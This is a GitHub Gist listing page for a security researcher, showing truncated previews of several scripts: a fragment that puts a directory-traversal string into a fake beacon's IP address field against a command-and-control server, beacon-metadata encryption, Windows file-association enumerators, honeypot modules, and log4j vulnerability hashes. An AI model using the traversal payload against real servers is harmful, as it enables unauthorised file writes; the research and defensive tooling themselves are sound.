Ollie olliencc
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # First we need to register a beacon with a directory traversal in the ip address field | |
| ip_address = "../../../../../../%s" % os.path.split(args.filepath)[0] | |
| # Generate symmetric keys (used later) | |
| raw_aes_keys = os.urandom(16) | |
| aes_key, hmac_key = generate_keys(raw_aes_keys) | |
| m = Metadata(public_key=args.public_key, cs_version=3) | |
| m.public_key = args.public_key | |
| m.bid = args.bid |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import M2Crypto | |
| import base64 | |
| import binascii | |
| PUBKEY_TEMPLATE = "-----BEGIN PUBLIC KEY-----\n{}\n-----END PUBLIC KEY-----" | |
| plaintext = "0000BEEF00000056D48A3A7104FC17544D5A3752C6EEAED4E404B5015FAD878000000A0000000431302E30093139322E3136382E3230302E313031094445534B544F502D3337325251544D0961646D696E0972756E646C6C33322E657865" | |
| buf = M2Crypto.BIO.MemoryBuffer(PUBKEY_TEMPLATE.format('MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDhOfC4TICevrbgiUVK5kmvU8aNQNiCfccHxIOV4wzjOn5DpaC49NLoKMsS2fVnMI/f+cbyuqfrXMYmUX8eZDWkmflrBFNOPG8hr8oqhm1EiIvK9S+CsOuLGsEOmefqYk+Gj1nfnJ1uO9ELRv1U+OhmQ77w4u0AZWHPSNr1STYhZQIDAQAB')) | |
| pubkey = M2Crypto.RSA.load_pub_key_bio(buf) | |
| ciphertext = pubkey.public_encrypt(binascii.unhexlify(plaintext), M2Crypto.RSA.pkcs1_padding) | |
| print (base64.b64encode(ciphertext)) |
olliencc
/ WindowsExtensionMap.bat
Created
June 29, 2020 13:54
Shows which program loads which extension when you double-click
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
| REM °² Enumerates all files extensions ²° | |
| REM °² and what opens them on Windows 10 in batch/cmd ²° | |
| REM °² twitter: @ollieatnccgroup ²° | |
| REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
| for /f "tokens=1,2 delims==" %%G in ('assoc') do ( | |
| echo Extension: %%G | |
| for /f "tokens=1,2 delims==" %%I in ('ftype %%H 2^> nul') do ( | |
| echo Program: %%J |
olliencc
/ WindowsExtensionMapCSV.bat
Created
June 29, 2020 13:58
Show which program will load which extension when you double click in CSV format
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
| REM °² Enumerates all files extensions ²° | |
| REM °² and what opens them on Windows 10 in batch/cmd ²° | |
| REM °² twitter: @ollieatnccgroup ²° | |
| REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
| for /f "tokens=1,2 delims==" %%G in ('assoc') do ( | |
| for /f "tokens=1,2 delims==" %%I in ('ftype %%H 2^> nul') do ( | |
| echo %COMPUTERNAME%,%%G,%%J | |
| ) |
olliencc
/ WindowsExtensionMapCSVPlus.bat
Created
June 29, 2020 20:28
Enumerate via various methods what opens what on Windows 10 using only batch/cmd
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
| REM °² Enumerates all files extensions ²° | |
| REM °² and what opens them on Windows 10 in batch/cmd ²° | |
| REM °² twitter: @ollieatnccgroup ²° | |
| REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
| REM ------------------------------------------------------ | |
| REM |
olliencc
/ nccgroupcanaryhttps.py
Last active
November 16, 2023 07:20
A Thinkst canary user module which listens on HTTPS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| INCIDENT_NAME = "NCCGROUPHTTPS" | |
| VERSION = "0.1" | |
| MODULE_DESCRIPTION = "NCCGROUPHTTPS" | |
| AUTHOR = "Ollie Whitehouse" | |
| AUTHOR_EMAIL = "ollie.whitehouse@nccgroup.com" | |
| CERT_FILE = "/tmp/selfsigned.crt" | |
| KEY_FILE = "/tmp/private.key" | |
| from opencanary.modules import CanaryService |
olliencc
/ canaryproxy0.1.py
Created
July 4, 2020 09:28
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ######################################################################## | |
| # | |
| # Thinkst Canary user module | |
| # to turn into a high interactive honeypot | |
| # https://canary.tools/ | |
| # | |
| # Ingrediants used: | |
| # - WSL | |
| # - Developer documentation - https://canary.tools/help/user-modules | |
| # - Opencanary for development - https://github.com/thinkst/opencanary/ |
olliencc
/ canaryproxy0.2.py
Last active
July 4, 2020 16:20
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ######################################################################## | |
| # | |
| # Thinkst Canary user module | |
| # to turn into a high interactive honeypot | |
| # https://canary.tools/ | |
| # | |
| # Ingrediants used: | |
| # - WSL | |
| # - Developer documentation - https://canary.tools/help/user-modules | |
| # - Opencanary for development - https://github.com/thinkst/opencanary/ |
olliencc
/ md5check.bat
Last active
March 6, 2021 12:59
Calculate MD5s for each file in a directory structure and then check if that MD5 is present in a file - if it isn't it will print out the list of files not found
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
| REM °² Calc file hashes and check they are present ²° | |
| REM °² in a file ²° | |
| REM °² ²° | |
| REM °² twitter: @ollieatnccgroup ²° | |
| REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
| REM example usage |
olliencc
/ log4j2-class-md5sum.txt
Last active
May 2, 2023 06:43
log4j2 CVE-2021-44228 patched three class files - https://gitbox.apache.org/repos/asf?p=logging-log4j2.git;h=c77b3cb - below are the inner class files (i.e. not jar) for each release to help locate vulnerable versions. Note: 2.0.15 was the patched version and is not vulnerable.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 04fdd701809d17465c17c7e603b1b202 ./2.11.0/apache-log4j-2.11.0-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
| 415c13e7c8505fb056d540eac29b72fa ./2.8/apache-log4j-2.8-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
| 415c13e7c8505fb056d540eac29b72fa ./2.8.1/apache-log4j-2.8.1-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
| 04fdd701809d17465c17c7e603b1b202 ./2.9.0/apache-log4j-2.9.0-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
| 8b2260b1cce64144f6310876f94b1638 ./2.4.1/apache-log4j-2.4.1-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
| a193703904a3f18fb3c90a877eb5c8a7 ./2.8.2/apache-log4j-2.8.2-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
| 3bd9f41b89ce4fe8ccbf73e43195a5ce ./2.6.1/apache-log4j-2.6.1-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
| 04fdd701809d17465c17c7e603b1b202 ./2.11.2/apache-log4j-2.11.2-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
| 21f055b62c15453f0d7970a9d994cab7 ./2.13.0/apache-log4j-2.13.0-bin/org/apache/logging/lo |